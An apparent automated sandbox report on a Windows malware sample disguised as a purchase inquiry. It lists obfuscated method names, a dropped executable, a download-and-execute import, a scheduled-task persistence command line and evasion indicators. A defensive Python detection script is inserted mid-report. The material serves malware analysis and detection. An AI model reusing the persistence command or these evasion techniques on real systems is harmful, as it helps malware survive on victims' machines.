            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, ixlCuvLaod7FlsCjho.cs | High entropy of concatenated method names: 'wG5e7JH6YK', 'oFyedO6XTj', 'hJreBv3P4J', 'wo6eEtWxpb', 'FVQe4eiIEU', 'cB7eg7agAt', 'Nyje8GorUV', 'sBEeCDBxcu', 'khCesgKNBS', 'qqVe3N3WFH'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, wpPir09WJs64xtIvcH.cs | High entropy of concatenated method names: 'J79fn8yfCF', 'MBWfpg66IG', 'zg9fRBuC7C', 'ToString', 'UllfZSFqnM', 'Fm2foih9eb', 'mNjqkGfglAvcstgrpZ2', 'rZAPqkf2oN9Ptr3R5Wb', 'fhGkd5flOqa7ltNg38x', 'aEE456fbE3XC8MZsNcx'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, GsiYJWW6oOdgKdhTNl.cs | High entropy of concatenated method names: 'Dispose', 'JcvSFcw2BT', 'AYpGx6xmDc', 'r3WdwykwiV', 'EhQSr92JaW', 'OTYSzPsVw3', 'ProcessDialogKey', 'FfNGTmWRlE', 'vdnGS72bQ2', 'JuIGG2mh2Z'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, KrxB0FGnmZKpkyNbXX.cs | High entropy of concatenated method names: 'vsPBtrBGW', 'xJtEdwoJR', 'yQdgnS2yA', 'ocp8OY3DT', 'rW1sYqSkA', 'PaM3cQKJf', 'Opme0mhLgXvl11dZ7F', 'MwMQuhZrXX7jyjJlPl', 'vARVc4f2M', 'Gw2Xv2ygC'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, D7aMauhAVxQYrmcyD0.cs | High entropy of concatenated method names: 's69fwNT3AD', 'bSXfW9UBry', 'pIWf0ijh5e', 'j4nfebD7F0', 'StuflnRFxY', 'mt60RljglO', 'D1g0ZNwMer', 'x3O0octTUv', 'xwv0mrWREF', 'OAL0Fqyxtl'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, q06fRr1ZQvBKjZ65oK.cs | High entropy of concatenated method names: 'J4sKQOIl62', 'aIeKIaKQOL', 'uc7K15vjlK', 'xUMKyqj2kD', 'O05KxJb5dy', 'uc1K6lWY3W', 'QW4KcGboxg', 'eYYK5ThnUg', 'OOjK9USPsd', 'STOKNx9OyD'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, T4r8SDCIv33WlslpT4.cs | High entropy of concatenated method names: 'ocVW1dFaPc', 'higWytRZIi', 'TQrWnSbhIC', 'KAaWpn9ZLG', 'LZLWRwRLhO', 'ly1WZoLlW6', 'm2iWoEmdPg', 'FmfWmF5a3k', 'bWTWFgfjtl', 'zEJWrgWUTp'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, voy5oLt5lQB891TIpt.cs | High entropy of concatenated method names: 'IkoYChHilV', 'B1TYsyrRk8', 'cSSYhQMx3d', 'kFPYxWGWFR', 'XrNYc8ROXt', 'ooVY51ADgL', 'uctYNYeS1Y', 'ss3YuBSGW1', 'E3aYQHDcL4', 'Of8YDvaFYv'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, cLlsgYs5GgOZjJJuSB.cs | High entropy of concatenated method names: 'SEcHEprBIm', 'vFuHgg3ZFW', 'AQUHCCOb7N', 'rvmHsSBsbE', 'xJIHKRmRUQ', 'STqHiaY15y', 'WvTHqQQZH3', 'WKaHVgiVI5', 'N9fH2WfIOd', 'lgiHXj4EgS'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, sq4j7xSMZiKRMXLZIsG.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OiMv29tXaO', 'P7WvXH6ruU', 'ydUvAfKjOa', 'KJsvvyx2gl', 'SNbvaSSmCM', 'CV9vkOfGbW', 'z8EvOwJ96J'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, geC6IOzmlqxGb0bPnU.cs | High entropy of concatenated method names: 'joFXgtVM1f', 'YgsXCCup30', 'xkaXskxKOK', 'frAXhKG9vx', 'h0vXxMOg0Z', 'vy1XcdSIeE', 'm6xX5pgE9X', 'xfmXOHHfUv', 'uvrX7V0cHE', 'ts5Xd6QyZ5'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, maZXEQ3nDp1ljW9RCv.cs | High entropy of concatenated method names: 'WZ904CbVya', 'zx508hIuOS', 'y91H66xFOJ', 'tZYHcW6TEy', 'WiwH5ueiVQ', 'jhWH9TY2TZ', 'pXdHN4Hplk', 'YM9HueLwsO', 'bIDHL46n8u', 'wIsHQ2lVh0'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, JWCbu2STQmAFYrqZv8L.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Sv5XD5E603', 'gY0XIB7kQ7', 'A0wXt0vc4s', 'M7lX1DcW04', 'xUFXyo1PxI', 'UHaXnS9iE2', 'GCeXp7M7Wg'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, QYTZ0oovg5cvcw2BTs.cs | High entropy of concatenated method names: 'UXs2KM2jco', 'EVL2q4o6Xq', 'Fmf22FGS89', 'k4f2ADpjHr', 'lIq2aoAJIx', 'unY2OtWk80', 'Dispose', 'Ur5VjauifP', 'Ae4VWBla1T', 'li3VHmFfck'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, hQHmh5SGuePN8j0Gbyu.csHigh entropy of concatenated method names: 'ToString', 'dqmACmHWL1', 'prsAsS4YGI', 'f8oA3bQ3ZA', 'T52AhW6PjM', 'E39Ax2qPDY', 'xClA64cxKb', 'ag0AcTfi5B', 'WQmwu7WfS8tc51jNQEo', 'aGivGAWO8QlJWtVySWZ'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, mRNTsXSSyB5C1XtedV6.csHigh entropy of concatenated method names: 'enFXrmbGgD', 'Ny9XzvgyX1', 'WhUATuBBSu', 'k8RASglAh7', 'UJtAG5soYc', 'grLAbAWoMg', 'J4rAMDXoOm', 'fFYAwHlsH0', 'MoCAjuB0SC', 'dTYAWGtM3u'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, rmh2ZarBytsKoPdbuC.csHigh entropy of concatenated method names: 'H4AXH8g7yW', 'q3BX06cgV5', 'qytXfo7ZQB', 'sC2Xerb7Da', 'VboX2Da0on', 'KZnXlBDAtv', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, EvUA2UpoCgZNBBO9DW.csHigh entropy of concatenated method names: 'IVOqJ6Q61y', 'B7DqPmqbbs', 'ToString', 'wqnqjnY9Y9', 'orUqWXk7tC', 'EmlqH1WaAC', 'hBAq0XVXJa', 'Osfqfmb9sD', 'FcAqeKLg3E', 'qeoqlI5lsr'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, Dp9d0sMygJjXH0e0n6.csHigh entropy of concatenated method names: 'hDpSe4r8SD', 'Pv3Sl3Wlsl', 'o5GSJgOZjJ', 'muSSPBJaZX', 'f9RSKCvC7a', 'eauSiAVxQY', 'jTjQo4khR4aPaqNxXF', 'SEUZZlLZ9C9jUkAfmZ', 'uJOSSbksl8', 'rEaSbn3PIn'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, LmWRlEFadn72bQ25uI.csHigh entropy of concatenated method names: 'Tdb2hPs62w', 'swZ2xMwDbm', 'k1d26eqDgf', 'uFB2cb9w8C', 'CF6253dokS', 'zjN29i6ANb', 'CKV2NNJDym', 'xQW2uT0RWL', 'wX92Lw09t6', 'JaB2QvOvNn'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, MxJBTdnmkSbNwtYdT9.csHigh entropy of concatenated method names: 'ToString', 'R8YiD9L5L1', 'vJKixlI7iH', 'a4ni6JGgPG', 'WUDick8F3Y', 'SMRi5xM1N9', 'ELQi90a2j8', 'BXiiNuqFrB', 'LP2iu7y4vQ', 'mXCiLLGB78'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, oAHMyelsBlebo17c9D.csHigh entropy of concatenated method names: 'lG7bwMD3C1', 'CBjbjCENcR', 'OgBbWWLvRc', 'JMhbHn7Q6D', 'Cibb0ddesT', 'XObbfxrFSN', 'aibbenTsjF', 'pGgbljXhUJ', 'UVnbUhQ7rh', 'BZ4bJsjh1V'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, XVx5eEZqSV66eFTjYZ.csHigh entropy of concatenated method names: 'dhfqmjHUXb', 'UNgqrGWUkb', 'dfOVTWFHZI', 'BxlVSIuUPi', 'm8hqDkdfD2', 'W6mqIJTbJR', 'QxJqtGHmoA', 'P1Mq1OEmyJ', 'hEjqyGRcQE', 'rdEqnx644D'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, ixlCuvLaod7FlsCjho.csHigh entropy of concatenated method names: 'wG5e7JH6YK', 'oFyedO6XTj', 'hJreBv3P4J', 'wo6eEtWxpb', 'FVQe4eiIEU', 'cB7eg7agAt', 'Nyje8GorUV', 'sBEeCDBxcu', 'khCesgKNBS', 'qqVe3N3WFH'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, wpPir09WJs64xtIvcH.csHigh entropy of concatenated method names: 'J79fn8yfCF', 'MBWfpg66IG', 'zg9fRBuC7C', 'ToString', 'UllfZSFqnM', 'Fm2foih9eb', 'mNjqkGfglAvcstgrpZ2', 'rZAPqkf2oN9Ptr3R5Wb', 'fhGkd5flOqa7ltNg38x', 'aEE456fbE3XC8MZsNcx'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, GsiYJWW6oOdgKdhTNl.csHigh entropy of concatenated method names: 'Dispose', 'JcvSFcw2BT', 'AYpGx6xmDc', 'r3WdwykwiV', 'EhQSr92JaW', 'OTYSzPsVw3', 'ProcessDialogKey', 'FfNGTmWRlE', 'vdnGS72bQ2', 'JuIGG2mh2Z'
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004063C6 ShellExecuteW,URLDownloadToFileW,14_2_004063C6
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeFile created: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeJump to dropped file

            Boot Survival

            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe - Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp"
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe - Code function: 14_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,14_2_00418A00
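The persistence evidence above (schtasks.exe /Create with a task definition staged as a .tmp file in the user's Temp directory, next to a dropped executable in AppData\Roaming) is the pattern a detection engineer would want to match in endpoint telemetry. The Python below is an added example and is not part of the Joe Sandbox report or of the sample; the process-creation lines and the task XML it parses are constructed to mirror the command line shown here, and the "image|command line" field layout, the XML contents (including that the task runs the dropped executable on logon) and the list of user-writable directories are assumptions.

```python
"""Detect schtasks-based persistence of the kind seen in this report:
schtasks.exe /Create /TN <name> /XML <file staged in Temp>, then inspect
the task XML for an action that runs an executable from a user-writable
path. Sample log lines and task XML are constructed, not from the report."""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Constructed process-creation records (image|command line), roughly what a
# Sysmon event 1 or Security 4688 record reduces to. The first line mirrors
# the command line in this analysis; the other two are benign noise.
SAMPLE_LOG = [
    r'C:\Windows\SysWOW64\schtasks.exe|"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp"',
    r'C:\Windows\System32\schtasks.exe|schtasks.exe /Query /TN "\Microsoft\Windows\Defrag\ScheduledDefrag"',
    r'C:\Windows\System32\schtasks.exe|schtasks.exe /Create /TN "Backup" /XML "C:\ProgramData\Vendor\backup.xml"',
]

# Constructed task definition (assumed to be what tmp3EA3.tmp contained).
# Real task XML written by schtasks is UTF-16; read it with encoding="utf-16".
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe</Command></Exec>
  </Actions>
</Task>"""

TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.I)
USER_WRITABLE_RE = re.compile(r"\\AppData\\(Roaming|Local)\\|\\Users\\Public\\", re.I)


@dataclass
class TaskCreation:
    task_name: str
    xml_path: str
    xml_in_temp: bool


@dataclass
class TaskAction:
    command: str
    triggers: list
    runs_from_user_writable: bool


def _arg(cmdline, flag):
    """Return the value following a schtasks flag, quoted or bare."""
    m = re.search(re.escape(flag) + r'\s+(?:"([^"]*)"|(\S+))', cmdline, re.I)
    return None if m is None else (m.group(1) or m.group(2))


def parse_task_creations(lines):
    """Pick out schtasks /Create invocations that import an XML definition."""
    hits = []
    for line in lines:
        image, _, cmdline = line.partition("|")
        if not image.lower().endswith("\\schtasks.exe"):
            continue
        if not re.search(r"\s/create\b", cmdline, re.I):
            continue
        xml_path = _arg(cmdline, "/XML")
        if xml_path is None:
            continue  # /TR-style creations carry the action inline; handled elsewhere
        hits.append(TaskCreation(_arg(cmdline, "/TN") or "", xml_path,
                                 bool(TEMP_DIR_RE.search(xml_path))))
    return hits


def inspect_task_xml(xml_text):
    """Extract the first Exec command and the trigger types from a task XML."""
    root = ET.fromstring(xml_text)
    commands = [c.text or "" for c in root.iter(TASK_NS + "Command")]
    trig_el = root.find(TASK_NS + "Triggers")
    triggers = [] if trig_el is None else [t.tag.replace(TASK_NS, "") for t in trig_el]
    command = commands[0] if commands else ""
    return TaskAction(command, triggers, bool(USER_WRITABLE_RE.search(command)))


def triage(lines, xml_by_path):
    """Return (task name, reasons) for creations worth an analyst's attention.
    xml_by_path maps the /XML path to the file's text, if it was recovered."""
    findings = []
    for tc in parse_task_creations(lines):
        reasons = []
        if tc.xml_in_temp:
            reasons.append("task XML staged in a Temp directory")
        xml_text = xml_by_path.get(tc.xml_path)
        if xml_text is not None:
            action = inspect_task_xml(xml_text)
            if action.runs_from_user_writable:
                reasons.append("runs %s from a user-writable path" % action.command)
            if "LogonTrigger" in action.triggers:
                reasons.append("logon trigger")
        if reasons:
            findings.append((tc.task_name, reasons))
    return findings


if __name__ == "__main__":
    recovered = {parse_task_creations(SAMPLE_LOG)[0].xml_path: SAMPLE_TASK_XML}
    for name, reasons in triage(SAMPLE_LOG, recovered):
        print(name, "->", "; ".join(reasons))
```

The /XML path alone is a strong signal because the .tmp file is typically deleted right after import; if the file is gone, the task definition can still be read back from C:\Windows\System32\Tasks\<task path> on the host, which is what xml_by_path is meant to be fed with.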

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (8 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (6 occurrences)
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe - Code function: 14_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041A8DA
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe - Process information set: NOOPENFILEERRORBOX (SetErrorMode with SEM_NOOPENFILEERRORBOX; 45 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
